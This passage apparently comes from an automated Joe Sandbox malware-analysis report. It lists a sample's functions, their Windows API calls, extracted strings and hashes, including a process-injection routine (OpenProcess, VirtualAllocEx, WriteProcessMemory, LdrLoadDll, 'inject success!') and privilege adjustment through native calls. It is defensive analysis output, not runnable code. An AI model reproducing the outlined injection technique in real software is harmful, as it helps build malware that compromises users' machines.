                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fsopen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3646066109-0
                                                                                                                                      • Opcode ID: e66af71de1faa7a68a46c90601ce728199fded7e3e0eebcb451bbbed62eabe6b
                                                                                                                                      • Instruction ID: ab08d5295d953412930388888dd7e8c1be20e6c40f02f8eef5f573d6d0602413
                                                                                                                                      • Opcode Fuzzy Hash: e66af71de1faa7a68a46c90601ce728199fded7e3e0eebcb451bbbed62eabe6b
                                                                                                                                      • Instruction Fuzzy Hash: 16C0927A44020CB7CF112A82EC12E4A7F1A9BC0664F148820FB1C1D161AA77EA61A689
                                                                                                                                      Function 69EC0E23 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __make__time64_t
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1242165881-0
                                                                                                                                      • Opcode ID: 5f2446f3e75e43e2549ab1216d78344c9aed32879290253eb41c07f426e25a17
                                                                                                                                      • Instruction ID: 8ad2af82e5c9d81146fe72a3d9265950f2f0f7a05f585fc58c992ad1a674df01
                                                                                                                                      • Opcode Fuzzy Hash: 5f2446f3e75e43e2549ab1216d78344c9aed32879290253eb41c07f426e25a17
                                                                                                                                      • Instruction Fuzzy Hash: A5B0123714830C6BDB04D5C9A502E8D37CCC7C4F28F204005F62C0B1819DB2F8C042DA
                                                                                                                                      Function 0049938C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __make__time64_t
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1242165881-0
                                                                                                                                      • Opcode ID: 5f2446f3e75e43e2549ab1216d78344c9aed32879290253eb41c07f426e25a17
                                                                                                                                      • Instruction ID: 0506ee95d2f7e7647cc960f31313df540a4aa7263ac0a03b84a3df5a359294d4
                                                                                                                                      • Opcode Fuzzy Hash: 5f2446f3e75e43e2549ab1216d78344c9aed32879290253eb41c07f426e25a17
                                                                                                                                      • Instruction Fuzzy Hash: D8B0123314834C2BDB1065CEA403E953BCC87C4B24F14001AB72C0B5829DA2FC8041D9
                                                                                                                                      Function 69E818D0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__strlwr$CleanupStartupgethostname
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1657729447-0
                                                                                                                                      • Opcode ID: 6faafa5d76316b0f92738c6bdd870a3ceaee526713e88fd9be7274d9c4cef453
                                                                                                                                      • Instruction ID: 1b074c8270c261e0931d1291d62faa0be6a588a2bf7149316f305ad178caa01b
                                                                                                                                      • Opcode Fuzzy Hash: 6faafa5d76316b0f92738c6bdd870a3ceaee526713e88fd9be7274d9c4cef453
                                                                                                                                      • Instruction Fuzzy Hash: D19004555F145F400D1055F4CD414344045D151F0F7507FF53477C54C4DF1040051040
                                                                                                                                      Function 0044E6F0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2aaa25ccc3c85815ef07f63d1b7b5b283f7278b4643f3bfbdb5fa20be67b64e1
                                                                                                                                      • Instruction ID: f37f8fb102dd8dacd94f199b56e1db19024a97b86ab8dc6fe022279776ac403a
                                                                                                                                      • Opcode Fuzzy Hash: 2aaa25ccc3c85815ef07f63d1b7b5b283f7278b4643f3bfbdb5fa20be67b64e1
                                                                                                                                      • Instruction Fuzzy Hash: 0B115E74D00208EBEF04DF91C585BADB7B5BB50319F2081AAD4065B340D779AF85DB46
                                                                                                                                      Function 69E920B0 Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                      • Opcode ID: d9545b2a1b7bdae2151b1ed0c6d2cd3ab32ae76a1bb7e1b861cc228ce46e637d
                                                                                                                                      • Instruction ID: e70d4b7367a9d60a5c562dc22af91654ac44fb2c08ed1776d8bd2c3be9f8a900
                                                                                                                                      • Opcode Fuzzy Hash: d9545b2a1b7bdae2151b1ed0c6d2cd3ab32ae76a1bb7e1b861cc228ce46e637d
                                                                                                                                      • Instruction Fuzzy Hash: ADE0A035A91300C7DF159708D89078A7296BFA1724B398029E85197340C730E883CBA1
                                                                                                                                      Function 00466A10 Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(?,000001F4), ref: 00466A2D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                      • Opcode ID: 1e6ce0f130cf1788f73b1dc0f75e82e75afcd4e1b2fdf1a755248bf1cef2c3bd
                                                                                                                                      • Instruction ID: e8f2022d95cab416fe94e27add7dd145999081a9f821555be40ae39b5bc93c6f
                                                                                                                                      • Opcode Fuzzy Hash: 1e6ce0f130cf1788f73b1dc0f75e82e75afcd4e1b2fdf1a755248bf1cef2c3bd
                                                                                                                                      • Instruction Fuzzy Hash: E7C08C70295306C3E92092DD2C02B77728C832371DF028023A406F1280FAAFE845A89B

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 69E9B0E0 Relevance: 87.9, APIs: 40, Strings: 10, Instructions: 361libraryloaderinjectionCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesA.KERNEL32 ref: 69E9B126
                                                                                                                                      • MessageBoxA.USER32(00000000,69EDE258,69EDE24C,00001000), ref: 69E9B146
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E9B15B
                                                                                                                                      • OutputDebugStringA.KERNEL32(in RDTP......), ref: 69E9B175
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E9B17C
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E9B19A
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E9B1AA
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E9B1B1
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 69E9B1D0
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EE4758), ref: 69E9B1E1
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E9B1E4
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 69E9B1EE
                                                                                                                                      • _malloc.LIBCMT ref: 69E9B1FF
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 69E9B217
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69E9B21E
                                                                                                                                      • _malloc.LIBCMT ref: 69E9B25C
                                                                                                                                      • _memset.LIBCMT ref: 69E9B26F
                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,?,?,?,00000400), ref: 69E9B287
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 69E9B2C9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtAllocateVirtualMemory), ref: 69E9B2D5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LdrLoadDll), ref: 69E9B2E1
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlInitAnsiString), ref: 69E9B2ED
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlAnsiStringToUnicodeString), ref: 69E9B2F9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlFreeUnicodeString), ref: 69E9B305
                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,00000400), ref: 69E9B325
                                                                                                                                      • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040,?,?,?,00000400), ref: 69E9B382
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000000,?,69EF697C,?,?,?,?,00000400), ref: 69E9B3F4
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000400), ref: 69E9B40E
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,?,?,00000400,?,?,?,?,00000400), ref: 69E9B429
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,?,?,00000024,?,?,?,?,00000400), ref: 69E9B44F
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,?,00000000,0000000C,?), ref: 69E9B48F
                                                                                                                                        • Part of subcall function 69EC0763: __lock.LIBCMT ref: 69EC0781
                                                                                                                                        • Part of subcall function 69EC0763: ___sbh_find_block.LIBCMT ref: 69EC078C
                                                                                                                                        • Part of subcall function 69EC0763: ___sbh_free_block.LIBCMT ref: 69EC079B
                                                                                                                                        • Part of subcall function 69EC0763: RtlFreeHeap.NTDLL(00000000,?,69EE8B60,0000000C,69EC7D3E,00000000,69EE8F08,0000000C,69EC7D78,?,?,?,69ED1AC7,00000004,69EE9288,0000000C), ref: 69EC07CB
                                                                                                                                        • Part of subcall function 69EC0763: GetLastError.KERNEL32(?,69ED1AC7,00000004,69EE9288,0000000C,69EC8E49,?,?,00000000,00000000,00000000,?,69EC77E5,00000001,00000214), ref: 69EC07DC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressDebugOutputProcProcessString$MemoryWrite$File$Handle__wfopen_s_malloc$AllocAttributesCloseCreateErrorFreeHeapLastMessageModuleOpenReadSizeVirtual___sbh_find_block___sbh_free_block__lock_memset
                                                                                                                                      • String ID: C:\pl.txt$LdrGetProcedureAddress$LdrLoadDll$NtAllocateVirtualMemory$RtlAnsiStringToUnicodeString$RtlFreeUnicodeString$RtlInitAnsiString$in RDTP......$inject success!$ntdll
                                                                                                                                      • API String ID: 1239639686-37007034
                                                                                                                                      • Opcode ID: 5d3e7da8ca697469476a61303e2f69293d17889c367d522ac612672baa5b38bc
                                                                                                                                      • Instruction ID: b7f16da30c41f277914c5374c0372793d6f99d0b237cb612277f2a6439e5dc01
                                                                                                                                      • Opcode Fuzzy Hash: 5d3e7da8ca697469476a61303e2f69293d17889c367d522ac612672baa5b38bc
                                                                                                                                      • Instruction Fuzzy Hash: 05D17BB1908340AFD711CF65CC84B2FBBE8AF89714F64491EF59497290EB74E909CB92
                                                                                                                                      Function 69E9BBD0 Relevance: 79.8, APIs: 19, Strings: 26, Instructions: 1060threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9BA50: _memset.LIBCMT ref: 69E9BA70
                                                                                                                                      • _memset.LIBCMT ref: 69E9BC15
                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 69E9BC27
                                                                                                                                        • Part of subcall function 69EAF32B: _malloc.LIBCMT ref: 69EAF349
                                                                                                                                        • Part of subcall function 69E94FD0: _malloc.LIBCMT ref: 69E94FF9
                                                                                                                                        • Part of subcall function 69E94FD0: _memcpy_s.LIBCMT ref: 69E95005
                                                                                                                                      • _memset.LIBCMT ref: 69E9C3F5
                                                                                                                                      • _sprintf.LIBCMT ref: 69E9C414
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E9C428
                                                                                                                                      • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,69EF697C,00000019,00000018,00000017,00000016,00000015,00000014), ref: 69E9C444
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC,?,?,?,?,?,?,?,?,69EF697C,00000019,00000018,00000017,00000016,00000015,00000014), ref: 69E9C44B
                                                                                                                                      • GetTickCount.KERNEL32 ref: 69E9C489
                                                                                                                                      • _rand.LIBCMT ref: 69E9C4A0
                                                                                                                                      • GetTickCount.KERNEL32 ref: 69E9C51E
                                                                                                                                      • _rand.LIBCMT ref: 69E9C52D
                                                                                                                                      • _malloc.LIBCMT ref: 69E9C5BF
                                                                                                                                      • GetTickCount.KERNEL32 ref: 69E9C61D
                                                                                                                                      • _malloc.LIBCMT ref: 69E9C690
                                                                                                                                      • _malloc.LIBCMT ref: 69E9C817
                                                                                                                                      • InitializeCriticalSection.KERNEL32(69EF2CB8), ref: 69E9C87F
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,69E9B990,?,00000000,00000000), ref: 69E9C897
                                                                                                                                      • _malloc.LIBCMT ref: 69E9C970
                                                                                                                                      • _memset.LIBCMT ref: 69E9C988
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$_memset$CountTick$DebugOutputString_rand$CreateCriticalCurrentDirectoryInitializeSectionThread__wfopen_s_memcpy_s_sprintf
                                                                                                                                      • String ID: "$C:\pl.txt$InitShareData hWndExe is : 0x%0X, m_sAppPath is : %s$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii$|ii
                                                                                                                                      • API String ID: 601799677-3443584566
                                                                                                                                      • Opcode ID: bc35188192541dc1e56262f03b6c05c8ebd905e066b9b4169d54496065cea15d
                                                                                                                                      • Instruction ID: 6326af26db940ee10a32391387b1ac120285ddd66f564554572c01394b7c97f4
                                                                                                                                      • Opcode Fuzzy Hash: bc35188192541dc1e56262f03b6c05c8ebd905e066b9b4169d54496065cea15d
                                                                                                                                      • Instruction Fuzzy Hash: 907257BA9543419BE710EB38580475F77E0BFC5788F35A81DE8A95B341EBB5C80A8363
                                                                                                                                      Function 69E8CA10 Relevance: 21.8, APIs: 9, Strings: 3, Instructions: 778COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__time64_rand
                                                                                                                                      • String ID: P$http://$https://
                                                                                                                                      • API String ID: 2807773216-806993781
                                                                                                                                      • Opcode ID: 7a93e0c7ba0e1ccbf1404993b22aec3c7b730419e0a7f4040264d6cc3aa4607b
                                                                                                                                      • Instruction ID: 6a9b703c85ef250c8342ec13cdde2d55bc6928fe1b0e728896cec5ab06767bad
                                                                                                                                      • Opcode Fuzzy Hash: 7a93e0c7ba0e1ccbf1404993b22aec3c7b730419e0a7f4040264d6cc3aa4607b
                                                                                                                                      • Instruction Fuzzy Hash: 1B52B4746083418FD715CFA8C650B9FB7E5BF86318F248A2EE49D87390DB709949CB92
                                                                                                                                      Function 69E9CCF0 Relevance: 21.2, APIs: 14, Instructions: 186nativememoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                      • ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                      • ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                      • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                      • ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                      • ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
